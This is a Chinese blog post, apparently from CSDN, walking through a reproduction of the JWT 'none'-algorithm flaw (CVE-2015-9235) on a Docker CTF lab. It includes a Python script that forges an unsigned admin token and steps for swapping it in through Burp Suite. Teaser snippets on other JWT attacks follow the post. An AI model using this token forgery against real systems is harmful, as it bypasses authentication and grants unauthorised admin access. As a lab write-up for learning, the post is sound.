JWT(Json Web Token)漏洞复现

最新推荐文章于 2024-05-24 10:02:54 发布
最新推荐文章于 2024-05-24 10:02:54 发布
阅读量503 收藏 3
点赞数 5
分类专栏: 漏洞复现 文章标签: java json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/three_1996/article/details/136740116
版权

空加密算法(cve-2015-9235)

1、centos(192.168.101.148)使用docker拉取环境

docker pull gluckzhang/ctf-jwt-token

2、在docker中启动服务

docker run --rm -p 9090:8080 gluckzhang/ctf-jwt-token

3、启动成功,访问主页,输入任意账号密码尝试登录

4、登录失败,会返回正确的账号和密码

5、使用正确的账号密码登录

6、登录后,开启burpSuite代理,刷新界面抓取到token

7、进入jwt.io网站,将token进行解密,发现payload中有角色信息:user

8、使用python的jwt库,修改payload中的角色信息后,生成新的token

jwt_encode.py

import jwt

payload={
"auth": 1710292524616,
"agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"role": "admin",
"iat": 1710292525
}
print( jwt.encode( payload, None, algorithm="none" ) )

9、将重新生成的token,替换到burp的请求

10、发送后即可获得admin权限。

three_1996
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JWT认证漏洞攻击详解总结
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1280
​ 0x01 JWT认证漏洞基础知识 1.JWT简介 JWT全称为JSON Web Token,将json对象作为载体来传输信息。通常用于身份认证和信息交换。JWT 可以使用密钥(HMAC 算法)或使用 RSA 或 ECDSA 的公钥/私钥对自身进行签名 2.JWT认证漏洞格式 每当用户访问站点中的资源时,对应的请求头认证默认为Authorization: jwt,JTW令牌认证以eyJ开头 JWT的数据头部如下: JWT的数据分为三部分:头部(Header),有效载荷(Payload),签名(Signa
JWT(json web token)包
01-22
JWT(json web token)是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准。 JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源。比如用在用户登录上...
JWT重放漏洞如何攻防?你的系统安全吗?
欢迎关注同名公众号,一起探索Java技术的奥秘,共同成长!
04-13 1063
JWT重放漏洞如何攻防?你的系统安全吗?
JWT越权访问漏洞
weixin_42786460的博客
10-18 221
JWT越权访问漏洞
JWT安全漏洞以及常见攻击方式
最新发布
zz12345600354的博客
05-24 1159
JWTJson WebToken的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。仅需要对该Token正确性进行校验即可,这就意味着基于token认证机制的应用,不需要去考虑用户在哪一台服务器登录了,为应用的扩展提供了便利。新技术带来便利的同时也会带来新的安全问题,如果JWT本身安全存在问题,那么整个身份认证机制就会得不到保障。JWT由三部分组成,类似于。
JWT漏洞(ctfshow345-350)
m0_67284865的博客
07-09 317
JWT 可以使用密钥(使用 HMAC 算法)或使用 RSA 的公钥/私钥对进行签名。当用户登录某一页面是,服务端会把一段加密的数据返回,相当于代替cookie作用,当下一次打开此登录页面时,客户端会将这一段自动发送给服务器端,服务器端根据收到的这一段数据,返回不同的页面,基本功能与cookie类似。这里盲猜123456,然后把user改成admin,用修改后的jwt加载进入,访问admin目录就可以了。得到密钥,然后user改成admin,密钥aaab,得到jwt载入,访问admin得到flag。
CTF比赛中JWT漏洞的利用
yj520400的博客
04-03 489
当随后使用此方法的网站开发人员假设它将专门处理使用 RS256 等非对称算法签名的 JWT 时,就会出现问题。在最近的ctf比赛中,经常可以碰到一些jwt相关的题目,然后感觉思路挺有意思,拿出来分享一下,后边也总结一下ctf比较常见的集jwt相关题目解题思路。使用的事RSA算法,弱密钥有点不太现实,试了一下另外两个jwt简单绕过:未对签名进行验证、未对加密算法进行强验证,不过都没成功。在这种情况下,如果服务器收到使用 HS256 等对称算法签名的令牌,则库的通用。原理挺简单的,可以看看我之前的文章。
Apache ShenYu JWT认证缺陷绕过漏洞 (CVE-2021-37580)
Adminxe的博客
12-29 2899
0x00 漏洞详情 Apache ShenYu(原名 Soul)是一个异步的、跨语言的、多协议的高性能响应式API 网关,并可应用于所有微服务场景。 2021 年 11 月 16日,Apache发布安全公告,公开了Apache ShenYu中的一个身份验证绕过漏洞(CVE-2021-37580),该漏洞的CVSS评分为9.8。由于ShenyuAdminBootstrap中JWT的错误使用,导致攻击者可以绕过身份验证,直接进入目标系统后台。 0x01 影响范围 Apache ShenYu 2.3.0..
Json web tokenJWT)攻防
网安君的博客
05-09 919
JWT介绍 JSON Web Tokens,是一种基于JSON的、用于在网络上声明某种主张的令牌(token)。JWT通常由三部分组成: 头信息(header), 消息体(payload)和签名(signature)。它是一种用于双方之间传递安全信息的表述性声明规范。JWT作为一个开放的标准(RFC 7519),定义了一种简洁的、自包含的方法,从而使通信双方实现以JSON对象的形式安全的传递信息。 “令牌使用私人秘密或公钥/私钥进行签名。例如,服务器可以生成具有“以管理员身份登录”声明的令牌并将其提供给客
php实现JWT(json web token)鉴权实例详解
01-03
JWTjson web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法...
JWT(json web token加密算法) for C# dll 文件,亲测可用
07-02
JSON Web TokenJWT)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为一个JSON对象。这个信息可以被验证和信任,因为它是数字签名的。JWT可用于身份验证、授权,以及...
jwtManip:Burp扩展,用于管理对JSON Web令牌进行解码的编码
05-07
jwtManip 一个Burp扩展,用于管理JSON Web令牌的解码/编码 地位 该脚本作为独立工具在Linux上运行良好。 大概它也可以在Windows上运行,但是我还没有在那里进行测试。 我目前正在努力使其与Burp集成(例如“发送到JWTManip”功能)。 使用情况 jwtManip.py可以接受JSON字符串或JSON Web令牌作为输入。 该脚本需要两个参数: 使用方法 要传递的数据 方法 编码 要求提供的输入数据为JSON字符串。 用法示例: ./jwtManip.py encode '{ "id": "56036e8c185a9a042239becb", "username": "testuser", "password": "usrpass", "iat": 1443213069, "exp": 1443216669 }' Token:
JWT-JSON Web Token實作分享1
08-08
JSON Web TokenJWT)是一种基于 token 的身份验证机制,它可以提供一种无状态、可扩展、安全的身份验证方式。下面将详细介绍 JWT 的实现和使用。 为什么需要 Web Token? 在服务器端身份验证中,传统的基于...
CTFHub-JSON Web Token-敏感信息泄露
feng的博客
09-09 1311
前言 以前是没有接触过JWT的,直到几天前看了看DDCTF的Web签到题,发现是知识盲区,后来看了看WP,才知道好多东西自己都没有学过,因此特地学习学习。 关于JWT的基础知识,我觉得下面这个文章写的挺好的: JSON Web Token 入门教程 知道了JWT的基础知识,我们便开始做CTFHub中关于JWT的相关题目。 WP 首先打开环境发现是要登录的,我们直接burp抓包来看一看: 在response里发现了token。我们直接对token的header和payload进行base64url解码,解码
JSON Web Tokens攻击漏洞手法
2301_76786857的博客
04-25 977
身份验证和授权是任何应用程序的关键组件。人们已经开发了各种标准和框架来促进此类组件的开发并使应用程序更加安全。其中,JSON Web Tokens (JWT) 多年来已成为流行的选择。JSON Web 令牌是一种开放的行业标准 RFC 7519 方法,用于在两方之间安全地发送数据。它们包含以 JSON 格式编码的信息(声明)。这些声明有助于相关各方之间交换具体细节。可以使用数字签名来验证和信任所包含的信息。
Apache Apisix jwt插件 (CVE-2022-29266) 密钥泄漏
m0_60732362的博客
04-25 2312
# CVE-2022-29266 Apache Apisix jwt插件 密钥泄漏 ## 漏洞描述 在2.13.1版本之前的APache APISIX中,攻击者可以通过向受 jwt-auth 插件保护的路由发送不正确的 JSON Web 令牌来通过错误消息响应获取插件配置的机密。依赖库 lua-resty-jwt 中的错误逻辑允许将 RS256 令牌发送到需要 HS256 令牌的端点,错误响应中包含原始密钥值。 ## 漏洞版本 Apache Apisix < 2.13.1 ##
docker菜鸟_使用回送4和docker实现基本的基于jwt的身份验证以实现完整的菜鸟1 2
weixin_26755331的博客
08-18 248
docker菜鸟LoopBack is a popular IBM library for building API’s fast and deploying them as micro services. It offers out of the box integration with TypeScript, Jest, Mocha and Docker (among others). In ...
Apache ShenYu Admin JWT认证绕过漏洞(CVE-2021-37580)
weixin_44047654的博客
01-11 486
Apache ShenYu Admin JWT认证绕过漏洞(CVE-2021-37580)
BurpSuite插件
mingyqf的博客
02-12 9116
Burp Extensions BurpSuite 相关收集项目,插件主要是非BApp Store(商店) 插件的安装 JAVA编写的插件: Python编写的插件: Python编写的插件,需要使用Jython。Jython本质上是一个Java应用程序,Jython允许编码人员使用Java编码调用Python库。也可以使用Python调用Java的库。 Jython下载地址: https://www.jython.org/download 下载好之后,添加到Burp。 导入Python编写的插件,导
JSON Web Token简单案例
05-25
好的,下面是一个简单的基于 JSON Web TokenJWT)的身份验证案例: 1. 安装所需的库 ``` pip install pyjwt ``` 2. 生成JWT Token ```python import jwt import datetime # 定义过期时间 expire_time = ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值